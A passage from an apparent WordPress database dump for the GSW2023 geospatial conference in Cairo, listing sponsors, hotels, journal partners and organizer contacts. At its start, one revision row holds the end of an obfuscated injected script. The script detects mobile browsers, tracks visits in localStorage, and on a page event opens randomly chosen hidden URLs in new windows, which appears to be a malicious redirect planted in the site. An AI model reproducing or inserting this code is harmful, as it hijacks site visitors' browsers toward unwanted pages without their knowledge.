|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:26:41','2023-08-15 23:26:41','',3066,'https://gsw2023.com/?p=5221',0,'revision','',0),
(5222,1,'2023-08-15 23:28:19','2023-08-15 23:28:19','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" 